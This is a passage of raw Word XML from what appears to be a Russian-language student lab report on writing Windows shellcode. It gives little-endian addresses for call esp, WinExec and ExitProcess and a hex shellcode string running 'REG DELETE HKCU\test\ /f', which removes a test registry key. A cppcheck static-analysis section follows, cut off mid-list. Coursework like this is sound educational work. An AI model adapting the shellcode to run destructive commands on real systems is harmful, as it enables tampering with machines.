        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>winexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - 74 AF</w:t>
      </w:r>
      <w:r w:rsidR="0054010C" w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 46 60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27789350" w14:textId="27E05770" w:rsidR="0054010C" w:rsidRPr="009D5664" w:rsidRDefault="00F6258E" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="140"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exitprocess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - 77 16</w:t>
      </w:r>
      <w:r w:rsidR="0054010C" w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> A2 7F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5245776D" w14:textId="6962CB1C" w:rsidR="0054010C" w:rsidRPr="009D5664" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="140"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0054010C">
        <w:t>буфер</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E036B43" w14:textId="77777777" w:rsidR="0054010C" w:rsidRPr="009D5664" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="140"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>little</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ending:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7436BAEF" w14:textId="0F6A7F4B" w:rsidR="0054010C" w:rsidRPr="009D5664" w:rsidRDefault="00F6258E" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="140"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>call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esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - \x9D\x73\x54</w:t>
      </w:r>
      <w:r w:rsidR="0054010C" w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\x77</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AE5B9B" w14:textId="669C7030" w:rsidR="0054010C" w:rsidRPr="009D5664" w:rsidRDefault="00F6258E" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="140"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>winexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - \x60\x46\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xAF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\x74</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDA8544" w14:textId="7D9F44AF" w:rsidR="0054010C" w:rsidRPr="009D5664" w:rsidRDefault="00F6258E" w:rsidP="00311BB5">
      <w:pPr>
        <w:pStyle w:val="140"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exitprocess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - \x7F\xA2\x16\x77</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E978C0" w14:textId="77777777" w:rsidR="00C94F45" w:rsidRPr="00C94F45" w:rsidRDefault="0054010C" w:rsidP="00C94F45">
      <w:pPr>
        <w:pStyle w:val="afa"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="004468C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Ш</w:t>
      </w:r>
      <w:r w:rsidR="00C94F45" w:rsidRPr="004468C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>елл-</w:t>
      </w:r>
      <w:r w:rsidRPr="004468C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>код</w:t>
      </w:r>
      <w:r w:rsidR="00C94F45" w:rsidRPr="004468C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00C94F45">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C94F45">
        <w:t>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90\</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94F45">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94F45">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94F45">
        <w:t>73\</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94F45">
        <w:t>77\</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94F45">
        <w:t>77\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xEB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C94F45">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94F45">
        <w:t>10\</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94F45">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94F45">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AC66AD" w14:textId="58BDB584" w:rsidR="0054010C" w:rsidRPr="00C94F45" w:rsidRDefault="0054010C" w:rsidP="00C94F45">
      <w:pPr>
        <w:pStyle w:val="afa"/>
      </w:pPr>
      <w:r w:rsidRPr="00C94F45">
        <w:t>53\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C94F45">
        <w:t>9\</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94F45">
        <w:t>60\</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94F45">
        <w:t>46\</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94F45">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94F45">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94F45">
        <w:t>77\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xFF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C94F45">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C94F45">
        <w:t>1\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xBB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C94F45">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94F45">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94F45">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C94F45">
        <w:t>2\</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94F45">
        <w:t>71\</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94F45">
        <w:t>76\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xFF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C94F45">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C94F45">
        <w:t>3\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C94F45">
        <w:t>8\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xEB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C94F45">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xFF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C94F45">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xFF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C94F45">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xFFREG</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C94F45">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94F45">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HKCU</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94F45">
        <w:t>\\</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94F45">
        <w:t>\\ /</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2737E027" w14:textId="1AC50AFB" w:rsidR="0054010C" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="140"/>
      </w:pPr>
      <w:r>
        <w:t>Затем был создана папка в реестре –</w:t>
      </w:r>
      <w:r w:rsidR="00F6258E" w:rsidRPr="00F6258E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F6258E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TEST</w:t>
      </w:r>
      <w:r w:rsidRPr="0054010C">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C30FC7" w14:textId="10A239F2" w:rsidR="0054010C" w:rsidRDefault="00F6258E" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="afd"/>
      </w:pPr>
      <w:r w:rsidRPr="00F6258E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A95BF0C" wp14:editId="5BEFAE8A">
            <wp:extent cx="5078886" cy="3651250"/>
            <wp:effectExtent l="19050" t="19050" r="26670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869" cy="36706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4D6492" w14:textId="33FDB61A" w:rsidR="0054010C" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="a1"/>
      </w:pPr>
      <w:r>
        <w:t>– Создание папки в реестре</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A902FF" w14:textId="3F389746" w:rsidR="005B6078" w:rsidRDefault="0054010C" w:rsidP="005B6078">
      <w:r>
        <w:t>Код бы</w:t>
      </w:r>
      <w:r w:rsidR="00F6258E">
        <w:t>л скомпилирован успешно и после</w:t>
      </w:r>
      <w:r w:rsidR="00F6258E" w:rsidRPr="00F6258E">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">папка была удалена, </w:t>
      </w:r>
      <w:r w:rsidR="00857773">
        <w:t xml:space="preserve">шелл-код </w:t>
      </w:r>
      <w:r w:rsidR="00D66B4F">
        <w:t xml:space="preserve">работает </w:t>
      </w:r>
      <w:r w:rsidR="00050662">
        <w:t>корректно</w:t>
      </w:r>
      <w:r w:rsidR="00857773">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD4B801" w14:textId="51921BEA" w:rsidR="005B6078" w:rsidRDefault="005B6078" w:rsidP="005B6078">
      <w:pPr>
        <w:pStyle w:val="afd"/>
      </w:pPr>
      <w:r w:rsidRPr="005B6078">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39EADA0F" wp14:editId="1B490CFD">
            <wp:extent cx="6070988" cy="3841750"/>
            <wp:effectExtent l="19050" t="19050" r="25400" b="254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366"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6128547" cy="38781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5CB27" w14:textId="6FF6A90B" w:rsidR="005B6078" w:rsidRDefault="005B6078" w:rsidP="005B6078">
      <w:pPr>
        <w:pStyle w:val="a1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:t>Реестр после запуска программы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BFED60" w14:textId="206F14CC" w:rsidR="00C94F45" w:rsidRPr="00C94F45" w:rsidRDefault="00C94F45" w:rsidP="00C94F45">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Статический анализатор</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767A1277" w14:textId="5653432E" w:rsidR="00AD107B" w:rsidRDefault="00C94F45" w:rsidP="00AD107B">
      <w:r>
        <w:t>С</w:t>
      </w:r>
      <w:r w:rsidR="00AD107B">
        <w:t xml:space="preserve"> помощью статического анализатора </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD107B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CppCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD107B" w:rsidRPr="00AD107B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AD107B">
        <w:t xml:space="preserve">проверим наш файл </w:t>
      </w:r>
      <w:r w:rsidR="00AD107B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidR="00AD107B" w:rsidRPr="00AD107B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AD107B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00AD107B" w:rsidRPr="00AD107B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA8E18B" w14:textId="31AE0989" w:rsidR="00AD107B" w:rsidRDefault="00AD107B" w:rsidP="00C94F45">
      <w:pPr>
        <w:pStyle w:val="afd"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25701617" wp14:editId="45A7582C">
            <wp:extent cx="6074511" cy="1314450"/>
            <wp:effectExtent l="19050" t="19050" r="2159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7138" cy="1321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F7C867" w14:textId="00C3B524" w:rsidR="00C94F45" w:rsidRDefault="00C94F45" w:rsidP="00C94F45">
      <w:pPr>
        <w:pStyle w:val="a1"/>
      </w:pPr>
      <w:r>
        <w:t>– Статический анализ кода</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38030070" w14:textId="3DA5C6DE" w:rsidR="00AD107B" w:rsidRPr="00AD107B" w:rsidRDefault="00AD107B" w:rsidP="00440CA3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Утилита </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cppcheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD107B">
        <w:t xml:space="preserve"> обнаружила следующее:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66349C9B" w14:textId="12FFFDC1" w:rsidR="00AD107B" w:rsidRPr="00AD107B" w:rsidRDefault="00AD107B" w:rsidP="00440CA3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Строки 2–3 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>missingIncludeSystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, информация): стандартные заголовочные файлы &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>stdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>&gt; и &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>string.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; не найдены в путях поиска </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>cppcheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это не ошибка кода — просто </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>cppcheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> не нас</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">троен на системные </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>include</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>-пути</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B68D0EF" w14:textId="2A60BB64" w:rsidR="00AD107B" w:rsidRPr="00AD107B" w:rsidRDefault="00AD107B" w:rsidP="00440CA3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Строка 7 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>constVariable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, стиль, CWE-398): переменная </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> может быть объявлена как </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, так как её значение не</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> изменяется после инициализации</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F242682" w14:textId="2528039E" w:rsidR="00AD107B" w:rsidRDefault="00AD107B" w:rsidP="00440CA3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
